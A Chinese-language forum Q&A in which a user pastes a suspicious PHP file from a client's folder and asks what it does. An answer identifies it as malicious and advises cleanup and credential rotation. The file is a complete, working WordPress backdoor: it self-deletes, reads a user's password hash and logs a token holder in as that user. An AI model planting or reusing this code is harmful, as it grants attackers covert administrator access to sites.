我在客户文件夹中发现一个奇怪的文件。我想知道这段代码的作用。这是什么意思
$file =( $p = strpos(__FILE__, "(") )=== false ? __FILE__ :
substr(__FILE__, 0, $p);
if (!unlink($file)){chmod($file, 0777);
unlink($file);
}define("ABSPATH", dirname(dirname($file))."/");
include_once(ABSPATH."wp-config.php");
include_once(ABSPATH."wp-admin/includes/file.php");
include_once(ABSPATH."wp-admin/includes/plugin.php");
include_once(ABSPATH."wp-admin/includes/theme.php");
include_once(ABSPATH."wp-admin/includes/misc.php");
$k = substr($_SERVER["QUERY_STRING"], 0, 32);
$u =
substr($_SERVER["QUERY_STRING"], 32);
$h = $wpdb->
get_var( $wpdb->
prepare(
"SELECT user_pass FROM {$wpdb->
users} WHERE ID = %s", $u ) );
if (
is_string($h) &
&
( $k === md5(mktime(date("H"), date("i"), 0).md5($h))
|| $k === md5(mktime(date("H"), date("i")-1, 0).md5($h))
|| $k === md5(mktime(date("H"), date("i")+1, 0).md5($h)) )){
wp_set_auth_cookie($u);
}header("Location:
".\'http://www.example.com/blog/wp-admin/\');
', LOCK_EX);
请帮助我有关此代码。是黑客代码还是其他?
#1我想你可以将其称为黑客代码。
它读取站点的敏感部分以获取盐和哈希值, 然后从数据库中获取密码。我认为你所有的凭据在该站点上都受到了损害。
【我文件夹下文件中的恶意代码。只想知道他在做什么】删除文件并清理站点后, 你应该使用所有权限轮换所有凭据, 并快速编辑config.php文件, 以用Wordpress API生成的新密钥替换盐键。
推荐阅读
- Mamp和WordPress URL更改
- 为我的主题制作更新通知功能
- 对(index)进行CSS更改()
- 使WP媒体不接受.html文件
- 使WordPress帖子以较小的分辨率将左侧列编辑为右侧列顶部
- hadoop的日常操作
- 8个Date命令使用示例
- 「推荐收藏!」MySQL技术之旅该换换你的数据库版本了,让我们一同迎接8.0的到来哦!
- Linux中rsync备份数据使用实例